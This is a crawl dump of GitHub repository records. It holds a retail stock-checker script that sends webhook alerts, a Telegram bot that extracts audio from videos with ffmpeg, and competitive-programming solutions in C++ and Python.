Nintendo\r\n\r\n\"https://www.walmart.com/ip/Nintendo-Switch-Console-with-Neon-Blue-Red-Joy-Con/709776123?selectedSellerId=0&irgwc=1&sourceid=imp_URNysUUQixyORUtwUx0Mo38XUki2dTUUET5x3c0&veh=aff&wmlspartner=imp_10078&clickid=URNysUUQixyORUtwUx0Mo38XUki2dTUUET5x3c0\": \"walmart_neon_switch\",\r\n\"https://www.walmart.com/ip/Nintendo-Switch-Console-with-Gray-Joy-Con/994790027?selectedSellerId=0&irgwc=1&sourceid=imp_URNysUUQixyORUtwUx0Mo38XUki2dRU0ET5x3c0&veh=aff&wmlspartner=imp_10078&clickid=URNysUUQixyORUtwUx0Mo38XUki2dRU0ET5x3c0\": \"walmart_gray_switch\",\r\n\"https://www.walmart.com/ip/Nintendo-Switch-Console-Animal-Crossing-New-Horizons-Edition/539083068?selectedSellerId=0&irgwc=1&sourceid=imp_URNysUUQixyORUtwUx0Mo38XUki2dRU0ET5x3c0&veh=aff&wmlspartner=imp_10078&clickid=URNysUUQixyORUtwUx0Mo38XUki2dRU0ET5x3c0\": \"walmart_animalcrossing_switch\",\r\n\"https://www.walmart.com/ip/Nintendo-Switch-Ring-Fit-Adventure-Black/434503657?selectedSellerId=0&irgwc=1&sourceid=imp_URNysUUQixyORUtwUx0Mo38XUki2dRU0ET5x3c0&veh=aff&wmlspartner=imp_10078&clickid=URNysUUQixyORUtwUx0Mo38XUki2dRU0ET5x3c0\": \"walmart_ringfit\"\r\n}\r\n\r\nclass Target:\r\n\r\n def __init__(self, url, hook):\r\n self.url = url\r\n self.hook = hook\r\n webhook_url = webhook_dict[hook]\r\n now = datetime.now()\r\n current_time = now.strftime(\"%H:%M:%S\")\r\n page = requests.get(url)\r\n al = page.text\r\n title = al[al.find('\"twitter\":{\"title\":') + 20 : al.find('\",\"card')]\r\n #print(title)\r\n if \"Temporarily out of stock\" in page.text:\r\n print(\"[\" + current_time + \"] \" + \"Sold Out: (Target.com) \" + title + \"\\n\")\r\n stockdict.update({url: 'False'})\r\n else: \r\n print(\"[\" + current_time + \"] \" + \"In Stock: (Target.com) \" + title + \" - \" + url)\r\n slack_data = {'content': current_time + \" \" + title + \" in stock at Target - \" + url}\r\n if stockdict.get(url) == 'False':\r\n response = requests.post(\r\n webhook_url, data=json.dumps(slack_data),\r\n headers={'Content-Type': 'application/json'})\r\n stockdict.update({url: 'True'})\r\n #print(stockdict)\r\n\r\nclass BestBuy:\r\n\r\n def __init__(self, sku, hook):\r\n self.sku = sku\r\n self.hook = hook\r\n webhook_url = webhook_dict[hook]\r\n now = datetime.now()\r\n current_time = now.strftime(\"%H:%M:%S\")\r\n url = 
\"https://www.bestbuy.com/api/tcfb/model.json?paths=%5B%5B%22shop%22%2C%22scds%22%2C%22v2%22%2C%22page%22%2C%22tenants%22%2C%22bbypres%22%2C%22pages%22%2C%22globalnavigationv5sv%22%2C%22header%22%5D%2C%5B%22shop%22%2C%22buttonstate%22%2C%22v5%22%2C%22item%22%2C%22skus%22%2C\" + sku + \"%2C%22conditions%22%2C%22NONE%22%2C%22destinationZipCode%22%2C%22%2520%22%2C%22storeId%22%2C%22%2520%22%2C%22context%22%2C%22cyp%22%2C%22addAll%22%2C%22false%22%5D%5D&method=get\"\r\n headers2 = {\r\n \"accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\r\n \"accept-encoding\": \"gzip, deflate, br\",\r\n \"accept-language\": \"en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7\",\r\n \"cache-control\": \"max-age=0\",\r\n \"upgrade-insecure-requests\": \"1\",\r\n \"user-agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.69 Safari/537.36\"\r\n }\r\n page = requests.get(url, headers=headers2)\r\n link = \"https://www.bestbuy.com/site/\" + sku + \".p?skuId=\" + sku\r\n al = page.text\r\n search_string = '\"skuId\":\"' + sku + '\",\"buttonState\":\"'\r\n stock_status = al[al.find(search_string) + 33 : al.find('\",\"displayText\"')]\r\n product_name = sku_dict.get(sku)\r\n if stock_status == \"SOLD_OUT\":\r\n print(\"[\" + current_time + \"] \" + \"Sold Out: (BestBuy.com) \" + product_name + \"\\n\")\r\n stockdict.update({sku: 'False'})\r\n elif stock_status == \"CHECK_STORES\":\r\n print(product_name + \" sold out @ BestBuy (check stores status)\")\r\n stockdict.update({sku: 'False'})\r\n else: \r\n if stock_status == \"ADD_TO_CART\":\r\n print(\"[\" + current_time + \"] \" + \"In Stock: (BestBuy.com) \" + product_name + \" - \" + url)\r\n slack_data = {'content': current_time + \" \" + product_name + \" In Stock @ BestBuy \" + link}\r\n if stockdict.get(sku) == 'False':\r\n response = requests.post(\r\n webhook_url, data=json.dumps(slack_data),\r\n headers={'Content-Type': 'application/json'})\r\n stockdict.update({sku: 'True'})\r\n #print(stockdict)\r\n\r\nclass Walmart:\r\n\r\n def __init__(self, url, hook):\r\n self.url = url\r\n self.hook = hook\r\n webhook_url = webhook_dict[hook]\r\n now = datetime.now()\r\n current_time = now.strftime(\"%H:%M:%S\")\r\n page = requests.get(url) \r\n al = page.text \r\n title = al[al.find('<meta property=\"twitter:title\" content=\"') + 40 : al.find('- Walmart.com\"/><script>window._wml.seoTags')]\r\n #print(title)\r\n if page.status_code == 200:\r\n if \"Add to cart\" in page.text:\r\n print(\"[\" + current_time + \"] \" + \"In Stock: (Walmart.com) \" + title)\r\n slack_data = {'content': current_time + \" \" + url + \" in stock at Walmart\"}\r\n if stockdict.get(url) == 'False':\r\n response = requests.post(\r\n webhook_url, data=json.dumps(slack_data),\r\n headers={'Content-Type': 'application/json'})\r\n stockdict.update({url: 'True'})\r\n else: \r\n print(\"[\" + current_time + \"] \" + \"Sold Out: (Walmart.com) \" + title + \"\\n\")\r\n stockdict.update({url: 'False'})\r\n\r\nfor url in urldict:\r\n hook = urldict[url]\r\n if \"bestbuy.com\" in url:\r\n print(\"BestBuy URL detected \" + hook + \"\\n\")\r\n parsed = urlparse.urlparse(url)\r\n sku = parse_qs(parsed.query)['skuId']\r\n sku = sku[0]\r\n bestbuylist.append(sku)\r\n headers = {\r\n \"accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\r\n \"accept-encoding\": \"gzip, deflate, br\",\r\n 
\"accept-language\": \"en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7\",\r\n \"cache-control\": \"max-age=0\",\r\n \"upgrade-insecure-requests\": \"1\",\r\n \"user-agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.69 Safari/537.36\"\r\n }\r\n page = requests.get(url, headers=headers)\r\n al = page.text\r\n title = al[al.find('<title >') + 8 : al.find(' - Best Buy</title>')]\r\n sku_dict.update({sku: title})\r\n bbdict.update({sku: hook})\r\n\r\n elif \"target.com\" in url:\r\n targetlist.append(url)\r\n print(\"Target URL detected \" + hook + \"\\n\")\r\n elif \"walmart.com\" in url:\r\n walmartlist.append(url)\r\n print(\"Walmart URL detected \" + hook + \"\\n\")\r\nfor url in urldict:\r\n stockdict.update({url: 'False'}) #set all URLs to be \"out of stock\" to begin\r\nfor sku in sku_dict:\r\n stockdict.update({sku: 'False'}) #set all SKUs to be \"out of stock\" to begin\r\nwhile True:\r\n\r\n# Target\r\n for url in targetlist:\r\n try:\r\n hook = urldict[url]\r\n Target(url, hook)\r\n except:\r\n print(\"Some problem occurred. Skipping instance...\")\r\n\r\n# Best Buy\r\n for sku in bestbuylist:\r\n try:\r\n hook = bbdict[sku]\r\n BestBuy(sku, hook)\r\n except:\r\n print(\"Some problem occurred. Skipping instance...\")\r\n\r\n# Walmart \r\n for url in walmartlist:\r\n try:\r\n hook = urldict[url]\r\n Walmart(url, hook)\r\n time.sleep(2)\r\n except:\r\n print(\"Some problem occurred. Skipping instance...\")\r\n time.sleep(2)\r\n\r\n time.sleep(2)\r\n \r\n" } ]
1
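A minimal sketch of the restock-notification pattern that all three scraper classes in the record above share (a webhook message fires only on an out-of-stock to in-stock transition, so each restock is announced once). It assumes only the `requests` library the original already uses; `last_state` mirrors the record's `stockdict`, and the `in_stock` flag stands in for whatever a per-site scraper determines:

import json

import requests

last_state = {}  # url -> bool; everything starts out-of-stock, like stockdict


def notify_if_restocked(url, webhook_url, in_stock):
    # Post exactly once per out-of-stock -> in-stock transition,
    # then record the latest observation for the next poll.
    if in_stock and not last_state.get(url, False):
        payload = {"content": f"{url} is back in stock"}
        requests.post(
            webhook_url,
            data=json.dumps(payload),
            headers={"Content-Type": "application/json"},
        )
    last_state[url] = in_stock

A side effect of keeping the state update outside the `if`: a poll that fails and is skipped leaves the previous state intact, so the transition is reported on the next successful poll rather than dropped.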
Naveengnn/AudioExtractorBot
https://github.com/Naveengnn/AudioExtractorBot
76e88ba46c2cbaf12efc7605706ea564c348bfa3
aee5243b486a339e37860130e5207fb0a6db9193
c62a7060f8966da880f5dcd1a0ba5259f2985080
refs/heads/main
2023-06-10T14:36:25.977752
2021-07-02T02:44:52
2021-07-02T02:44:52
382,211,578
0
0
null
2021-07-02T02:43:55
2021-06-25T07:39:26
2021-06-21T12:49:57
null
[ { "alpha_fraction": 0.44736841320991516, "alphanum_fraction": 0.7017543911933899, "avg_line_length": 13.375, "blob_id": "83e5401d5513aa0b78f8b86ec56ff4b3d45ce52e", "content_id": "29c394bc9647e13baf4d73d6a205c3d5addb48ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 114, "license_type": "no_license", "max_line_length": 19, "num_lines": 8, "path": "/requirements.txt", "repo_name": "Naveengnn/AudioExtractorBot", "src_encoding": "UTF-8", "text": "Pyrogram==1.2.9\ntgcrypto\nrequests==2.25.1\ncertifi==2018.11.29\nchardet==3.0.4\nidna==2.8\nsix==1.12.0\nurllib3==1.26.5" }, { "alpha_fraction": 0.4846649467945099, "alphanum_fraction": 0.49591386318206787, "avg_line_length": 32.019046783447266, "blob_id": "92635dff561bc893525ece66b25f5d0a4d867f36", "content_id": "a56b8161b6027702d1758463e23a9f0076d119bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10463, "license_type": "no_license", "max_line_length": 115, "num_lines": 315, "path": "/bot/__main__.py", "repo_name": "Naveengnn/AudioExtractorBot", "src_encoding": "UTF-8", "text": "r\"\"\"\n _ _ _ \n / \\ _ _ __| |(_) ___\n / _ \\ | | | | / _` || | / _ \\\n / ___ \\ | |_| || (_| || || (_) |\n/_/ \\_\\ \\__,_| \\__,_||_| \\___/\n _____ _ _\n | ____|__ __| |_ _ __ __ _ ___ | |_ ___ _ __\n | _| \\ \\/ /| __|| '__| / _` | / __|| __| / _ \\ | '__|\n | |___ > < | |_ | | | (_| || (__ | |_ | (_) || |\n |_____|/_/\\_\\ \\__||_| \\__,_| \\___| \\__| \\___/ |_|\n ____ _\n | __ ) ___ | |_\n | _ \\ / _ \\ | __|\n | |_) || (_) || |_\n |____/ \\___/ \\__|\n\ntelegramChannel - t.me/IndianBots\ninitialRelease - 21/06/21\n\"\"\"\n\n# Inbuilt\nfrom os import mkdir, system as spawn, path, remove\nfrom threading import Thread\n\n# sitePackages\nfrom pyrogram import Client, filters\nfrom pyrogram.types import InlineKeyboardMarkup, InlineKeyboardButton\n\n# selfMade\nfrom config import Config\n\n\napp = Client(\n \"AudioExtractorBot\",\n api_id=Config.apiId,\n api_hash=Config.apiHash,\n bot_token=Config.botToken,\n)\n\n\ndef getFileSize(filePath: str):\n fileSize = path.getsize(filePath)\n if fileSize < 1024:\n return f\"{fileSize}B\"\n elif 1024 <= fileSize <= 1048576:\n return f\"{round(fileSize / 1024, 2)} KB\"\n elif 1048576 < fileSize < 1073741824:\n return f\"{round(fileSize / 1048576, 2)} MB\"\n elif 1073741824 < fileSize < 1073741824:\n return f\"{round(fileSize / 1099511627776, 2)} GB\"\n\n\ndef getThumbnail(thumbs: list):\n if not len(thumbs) >= 1:\n return f\"./bot/defaultThumb.jpg\"\n return app.download_media(thumbs[0].file_id)\n\n\ndef downloadProgress(current, total, message):\n del total\n app.edit_message_text(\n message.chat.id,\n message.message_id,\n f\"Downloading - `{current}` **Bytes**\",\n parse_mode=\"md\",\n )\n\n\ndef uploadProgress(current, total, message):\n app.edit_message_text(\n message.chat.id,\n message.message_id,\n f\"Uploading -\\n\"\n f\"`{current}/{total}` **Bytes**\\n\"\n f\"Progress - {current * 100 / total:.1f}%✅\",\n parse_mode=\"md\",\n )\n\n\ndef delMessage(message):\n try:\n app.delete_messages(\n message.chat.id,\n message.message_id,\n )\n except Exception as _:\n print(f\"[Errno 0] Can't delete message: '{message.message_id}'\")\n\n\ndef checkUserJoinStatus(user_id):\n try:\n channel = app.get_chat_member(\"IndianBots\", user_id)\n group = app.get_chat_member(\"IndianBotsChat\", user_id)\n except Exception as _:\n channel = False\n group = False\n if channel and group:\n return True\n return 
False\n\n\[email protected]_message(filters.video or filters.video_note or filters.document)\ndef extractAudio(_, message):\n userjoinStatus = checkUserJoinStatus(message.from_user.id)\n if not userjoinStatus:\n return app.send_message(\n message.chat.id,\n f\"Sorry `{message.from_user.first_name}`,\\n\"\n f\"I can't let you use me until you join both my **Channel** and **Group**.\",\n parse_mode=\"md\",\n reply_markup=InlineKeyboardMarkup([\n [\n InlineKeyboardButton(\n text=\"🖥Channel💺\",\n url=\"https://t.me/IndianBots\",\n ),\n ],\n [\n InlineKeyboardButton(\n text=\"🧬Group🚦\",\n url=\"https://t.me/IndianBotsChat\",\n ),\n ]\n ])\n )\n infoMessage = app.send_message(\n message.chat.id,\n \"Downloading - 0%\",\n reply_to_message_id=message.message_id,\n )\n try:\n _ = message.video\n filePath = app.download_media(\n message.video.file_id,\n progress=downloadProgress,\n progress_args=(infoMessage,),\n )\n resultFile = f\"{message.from_user.id}-{message.message_id}\"\n spawn(f\"ffmpeg -i {filePath} -f mp3 -ab 192000 -vn -loglevel quiet ./extracted/{resultFile}.mp3\")\n if not path.exists(f\"./extracted/{resultFile}.mp3\"):\n return app.send_message(message.chat.id, \"Couldn't Extract The Audio From This File. Sorry!\")\n fileSize = getFileSize(f\"./extracted/{resultFile}.mp3\")\n fileThumb = getThumbnail(message.video.thumbs)\n infoMessageUpload = app.send_message(\n message.chat.id,\n \"Uploading - 0%\",\n reply_to_message_id=message.message_id,\n )\n app.send_audio(\n message.chat.id,\n f\"./extracted/{resultFile}.mp3\",\n caption=f\"{fileSize} | 192 kbps | @IndianBots\",\n reply_to_message_id=message.message_id,\n file_name=f\"{message.video.file_name.split('.')[0]}\",\n thumb=fileThumb,\n progress=uploadProgress,\n progress_args=(infoMessageUpload,),\n )\n Thread(target=delMessage(infoMessage)).start()\n Thread(target=delMessage(infoMessageUpload)).start()\n remove(f\"./extracted/{resultFile}.mp3\")\n remove(f\"{filePath}\")\n remove(f\"{fileThumb}\")\n except Exception as error:\n print(error)\n app.send_message(message.chat.id, \"Couldn't Extract The Audio From This File. 
Sorry!\")\n Thread(target=delMessage(infoMessage)).start()\n Thread(target=delMessage(infoMessageUpload)).start()\n\n\[email protected]_message(filters.command(\"start\"))\ndef startCommand(_, message):\n userjoinStatus = checkUserJoinStatus(message.from_user.id)\n if not userjoinStatus:\n return app.send_message(\n message.chat.id,\n f\"Sorry `{message.from_user.first_name}`,\\n\"\n f\"I can't let you use me until you join both my **Channel** and **Group**.\",\n parse_mode=\"md\",\n reply_markup=InlineKeyboardMarkup([\n [\n InlineKeyboardButton(\n text=\"🖥Channel💺\",\n url=\"https://t.me/IndianBots\",\n ),\n ],\n [\n InlineKeyboardButton(\n text=\"🧬Group🚦\",\n url=\"https://t.me/IndianBotsChat\",\n ),\n ]\n ])\n )\n app.send_message(\n message.chat.id,\n f\"Hoi **{message.from_user.first_name}**!\\n\"\n f\"I hope you are pushing healty through the `Covid19 Pandemic.`\\n\"\n f\"I am a **Audio Extractor Bot** made by **@Akash_am1**, i extract audio from videos and send it to you.\\n\"\n f\"For help - /commands\\n\"\n f\"Acknowledgment -\\n\\n\"\n f\"[Pyrogram](https://github.com/pyrogram/pyrogram)\\n\"\n f\"[FFmpeg](https://www.ffmpeg.org/)\\n\"\n f\"[Python](https://www.python.org/)\",\n disable_web_page_preview=True,\n parse_mode='md',\n )\n\n\[email protected]_message(filters.command([\"github\", \"source\"]))\ndef source_or_github(_, message):\n userjoinStatus = checkUserJoinStatus(message.from_user.id)\n if not userjoinStatus:\n return app.send_message(\n message.chat.id,\n f\"Sorry `{message.from_user.first_name}`,\\n\"\n f\"I can't let you use me until you join both my **Channel** and **Group**.\",\n parse_mode=\"md\",\n reply_markup=InlineKeyboardMarkup([\n [\n InlineKeyboardButton(\n text=\"🖥Channel💺\",\n url=\"https://t.me/IndianBots\",\n ),\n ],\n [\n InlineKeyboardButton(\n text=\"🧬Group🚦\",\n url=\"https://t.me/IndianBotsChat\",\n ),\n ]\n ])\n )\n app.send_message(\n message.chat.id,\n \"My Source Code Can be Found On Github...\\n\"\n \"https://github.com/BLUE-DEVIL1134/AudioExtractorBot\"\n )\n\n\[email protected]_message(filters.command(\"commands\"))\ndef commands(_, message):\n userjoinStatus = checkUserJoinStatus(message.from_user.id)\n if not userjoinStatus:\n return app.send_message(\n message.chat.id,\n f\"Sorry `{message.from_user.first_name}`,\\n\"\n f\"I can't let you use me until you join both my **Channel** and **Group**.\",\n parse_mode=\"md\",\n reply_markup=InlineKeyboardMarkup([\n [\n InlineKeyboardButton(\n text=\"🖥Channel💺\",\n url=\"https://t.me/IndianBots\",\n ),\n ],\n [\n InlineKeyboardButton(\n text=\"🧬Group🚦\",\n url=\"https://t.me/IndianBotsChat\",\n ),\n ]\n ])\n )\n app.send_message(\n message.chat.id,\n \"List of all Commands are given below -\\n\"\n \"\\n\"\n \"/help - Show this message\\n\"\n \"/commands - Show this message\\n\"\n \"/start - Restart/Refresh the bot\\n\"\n \"/help - Get help on how to use me.\",\n parse_mode=\"md\",\n )\n\n\[email protected]_message(filters.command(\"help\"))\ndef commands(_, message):\n userjoinStatus = checkUserJoinStatus(message.from_user.id)\n if not userjoinStatus:\n return app.send_message(\n message.chat.id,\n f\"Sorry `{message.from_user.first_name}`,\\n\"\n f\"I can't let you use me until you join both my **Channel** and **Group**.\",\n parse_mode=\"md\",\n reply_markup=InlineKeyboardMarkup([\n [\n InlineKeyboardButton(\n text=\"🖥Channel💺\",\n url=\"https://t.me/IndianBots\",\n ),\n ],\n [\n InlineKeyboardButton(\n text=\"🧬Group🚦\",\n url=\"https://t.me/IndianBotsChat\",\n ),\n ]\n ])\n )\n 
app.send_message(\n message.chat.id,\n \"It's real **easy** to use me.\\n\"\n \"All you need to do is send me a **video file** and i will **extract the audio** \"\n \"and send it to you.\",\n parse_mode=\"md\",\n )\n\n\nif __name__ == \"__main__\":\n print(\"Starting ...\")\n if not path.exists(\"./extracted\"):\n mkdir(\"./extracted\")\n app.run()\n" }, { "alpha_fraction": 0.7226277589797974, "alphanum_fraction": 0.7226277589797974, "avg_line_length": 33.25, "blob_id": "77769863ec9a50f2e12bc3c41441290fbff86ba9", "content_id": "ecb83cd26aa5a4dea581ad243aa080a433c4177e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 137, "license_type": "no_license", "max_line_length": 88, "num_lines": 4, "path": "/README.md", "repo_name": "Naveengnn/AudioExtractorBot", "src_encoding": "UTF-8", "text": "# #TODO\n\nFor now, please fork the repo and they connect it to your heroku account and deploy.<br>\nPlease **Give a Star** if you like it.\n" } ]
3
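The bot in the record above ships a `getFileSize` helper whose gigabyte branch can never execute — `1073741824 < fileSize < 1073741824` is false for every value — and whose would-be GB case divides by the terabyte constant 1099511627776, so any file of 1 GiB or larger falls through and returns `None`. A corrected sketch under the same binary-unit convention the original's constants imply:

from os import path


def get_file_size(file_path: str) -> str:
    # Human-readable size with the original's 1024-based thresholds.
    size = path.getsize(file_path)
    if size < 1024:
        return f"{size}B"
    if size < 1048576:  # 1 MiB
        return f"{round(size / 1024, 2)} KB"
    if size < 1073741824:  # 1 GiB
        return f"{round(size / 1048576, 2)} MB"
    return f"{round(size / 1073741824, 2)} GB"

Two smaller issues in the same file are worth flagging: `Thread(target=delMessage(infoMessage)).start()` calls `delMessage` immediately and hands its `None` return value to the thread — `Thread(target=delMessage, args=(infoMessage,))` defers the call — and Pyrogram filters compose with the bitwise `|` operator, so `filters.video or filters.video_note or filters.document` evaluates to `filters.video` alone (the `except` branch likewise references `infoMessageUpload`, which is unbound when the failure occurs before the upload stage).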
Teja-09/Programming
https://github.com/Teja-09/Programming
bac099f7a1ba1fca090828b998cc510b057e71c1
71e582beaa6183f6004da9b06262edfce4f74dd3
6bb482c40b19d28db34d2313b83b061839eb4547
refs/heads/master
2021-08-09T13:06:35.254225
2020-05-28T05:31:06
2020-05-28T05:31:06
184,236,394
0
0
MIT
2019-04-30T09:49:50
2019-12-17T10:11:27
2019-12-29T06:22:17
Java
[ { "alpha_fraction": 0.3019125759601593, "alphanum_fraction": 0.3265027403831482, "avg_line_length": 9.309859275817871, "blob_id": "38e56149f3ba0ac5cfb6fe24cb013e22213d06df", "content_id": "421ca52fcb76cd475f4b4ba9b1dbed7fed1778ee", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 732, "license_type": "permissive", "max_line_length": 38, "num_lines": 71, "path": "/April Long_2020/Strange Number.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\nusing namespace std;\n\nbool find(long long x, long long k) \n{\n \tint ct = 0;\n\t\n\twhile (x % 2 == 0)\n\t{\n\t\tct += 1;\n\t\tx /= 2;\n\t}\n\n\tfor(int i = 3; i <= sqrt(x); i += 2) \n\t{\n\t\twhile (x % i == 0) \n\t\t{\n\t \t\tct += 1;\n\t \t\tx /= i;\n\t\t}\n\t}\n\n\tif(x > 2)\n\t{\n\t\tct += 1;\n\t}\n\n\tif (ct >= k)\n\t{\n\t\treturn true;\n\t}\n\telse\n\t{\n \treturn false;\n \t}\n}\n\nint main()\n{\n int t;\n cin >> t;\n while(t--)\n {\n long long x, k;\n cin >> x >> k;\n\n if (k > 1)\n\t{\n \tif(find(x, k)) \n\t\t{\n \tcout << \"1\" << \"\\n\";\n \t}\n\t\telse \n\t\t{\n \tcout << \"0\" << \"\\n\";\n \t}\n }\n\telse \n\t{\n \tif (x > 1) \n\t\t{\n \tcout << \"1\" << \"\\n\";\n \t} \n\t \telse \n\t\t{\n \tcout << \"0\" << \"\\n\";\n \t}\n }\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.3254376947879791, "alphanum_fraction": 0.35942327976226807, "avg_line_length": 19.5744686126709, "blob_id": "86b45ad2d414fe52067c4c77fe30c50f4b72883f", "content_id": "17e5d7bf103fa7e297e9168c46c0c5163d4e1f15", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 971, "license_type": "permissive", "max_line_length": 45, "num_lines": 47, "path": "/C++/May Long/Coronavirus Spread.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 1 17:03:30 2020\n\n@author: teja\n\"\"\"\n\nt = int(input())\nwhile(t):\n n = int(input())\n l = list(map(int,input().split()))\n count = 0\n maxi = 0\n mini = 10000\n size = len(l)\n for i in range(1, size):\n if l[i] - l[i-1] <= 2:\n count+=1\n else:\n count+=1\n if(count < mini):\n mini = count\n \n if(count > maxi):\n maxi = count\n \n count = 0\n \n if i == size-1 and l[i] - l[i-1] > 2:\n count+=1\n if(count < mini):\n mini = count\n \n if(count > maxi):\n maxi = count\n \n count = 0\n \n if(count != 0):\n count+=1;\n if(count < mini):\n mini = count\n \n if(count > maxi):\n maxi = count\n print(str(mini) + \" \" + str(maxi))\n t-=1\n " }, { "alpha_fraction": 0.4933774769306183, "alphanum_fraction": 0.5662251710891724, "avg_line_length": 14.149999618530273, "blob_id": "657df0b4b4c59466e5f407722e1c4bc606b3d2a2", "content_id": "0712cf5a1f905676c94bc64310719317e3856625", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 302, "license_type": "permissive", "max_line_length": 40, "num_lines": 20, "path": "/openlab_coding_preperation/list.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 1 14:45:05 2020\n\n@author: teja\n\"\"\"\n\n#l = list(map(int, input().split()))\n#print(l)\n\n#sq = list(map(lambda x: x*x , l))\n#print(sq)\n\n#fil = list(filter(lambda x: x%2==0, l))\n#print(fil)\n\ndict={1:3, 2:[5,6,7]}\n\nprint(len(dict[2]))\nprint(dict.get(3) == None)" }, { "alpha_fraction": 0.4672897160053253, "alphanum_fraction": 0.47975078225135803, 
"avg_line_length": 10.88888931274414, "blob_id": "1943053e8d7baf71254008ee62fe74e868c63adf", "content_id": "d2ba35d062c5f339c87f55f3bb451217c4259cfd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 321, "license_type": "permissive", "max_line_length": 28, "num_lines": 27, "path": "/C++/ZCO14003.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tlong long n,i;\n\tcin >> n;\n\tvector< long long >a(n);\n\tfor(i=0;i<n;i++)\n\t{\n\t\tcin >> a[i];\n\t}\n\tsort(a.begin(),a.end());\n\tlong long max = 0,temp = 0;\n\tfor(i=0;i<n;i++)\n\t{\n\t\ttemp = a[i]*(n-i);\n\t\tif(temp > max)\n\t\t{\n\t\t\tmax = temp;\n\t\t}\n\t}\n\tcout << max << \"\\n\";\n\t\n\t\n\t\n}\n" }, { "alpha_fraction": 0.40316206216812134, "alphanum_fraction": 0.4940711557865143, "avg_line_length": 12.368420600891113, "blob_id": "989e1e9fea57cc22c48bb315539c1fcbfc433344", "content_id": "b540fc941bcf2003a0a3157d4b25c53b89adaf5e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 253, "license_type": "permissive", "max_line_length": 33, "num_lines": 19, "path": "/C++/SUMMOD.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tint t;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tlong long n,i,sum = 0,val = 1;\n\t\tcin >> n;\n\t\tfor(i=1;i<=n;i++)\n\t\t{\n\t\t\tval = (val * i) % 1000000007;\n\t\t\tsum += val; \n\t\t}\n\t\tcout << sum%1000000007 << \"\\n\";\n\t}\n}" }, { "alpha_fraction": 0.42288556694984436, "alphanum_fraction": 0.5472636818885803, "avg_line_length": 10.222222328186035, "blob_id": "4d0c32bf3f0c47c35cd2685e88fd3bb71a0798e4", "content_id": "e53039a98f1c3f481a60ca38e6ade050439ef33f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 201, "license_type": "permissive", "max_line_length": 35, "num_lines": 18, "path": "/openlab_coding_preperation/stack.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 2 17:07:59 2020\n\n@author: teja\n\"\"\"\n\n# Stack\nl = [1, 2, 3, 4]\nl.append(10)\nprint(l.pop())\nprint(l)\n\n#Queue\nl = [1, 2, 3, 4]\nl.append(20)\nl.pop(0)\nprint(l)" }, { "alpha_fraction": 0.4938271641731262, "alphanum_fraction": 0.5061728358268738, "avg_line_length": 12, "blob_id": "b9c615a93e1ba0e1365dc49371660a258a68123f", "content_id": "d4551ebb95604de2f07c96c57eb22280bb4e3020", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 324, "license_type": "permissive", "max_line_length": 34, "num_lines": 25, "path": "/C++/ZCO13001.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tios_base::sync_with_stdio(false);\n cin.tie(NULL);\n\tlong n;\n\tlong long rev = 0;\n\tcin >> n;\n\tvector < int >st(n);\n\tlong i,j;\n\tfor(i=0;i<n;i++)\n\t{\n\t\tcin >> st[i];\n\t}\n\tfor(i=0;i<n;i++)\n\t{\n\t\tfor(j=i+1;j<n;j++)\n\t\t{\n\t\t\trev += abs(st[i] - st[j]);\n\t\t}\n\t}\n\tcout << rev;\n}" }, { "alpha_fraction": 0.4045368731021881, "alphanum_fraction": 0.4328922629356384, "avg_line_length": 12.225000381469727, "blob_id": "6567bf38d734035fc317b32a6954c8a8c7cad1fa", "content_id": "d398727db5ca4a5132662527316e3f553bf4ab98", "detected_licenses": [ "MIT" ], 
